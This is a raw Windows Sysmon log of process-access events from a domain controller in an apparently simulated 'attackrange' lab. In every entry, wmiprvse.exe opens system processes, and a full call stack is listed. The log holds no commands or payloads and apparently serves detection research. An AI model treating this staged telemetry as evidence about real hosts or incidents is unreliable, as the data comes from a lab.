15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022745Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022744Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022743Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022742Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022741Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022740Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022739Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022738Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022737Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022736Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022735Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022734Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022733Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022732Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022731Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022730Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022729Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022728Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022727Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022726Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 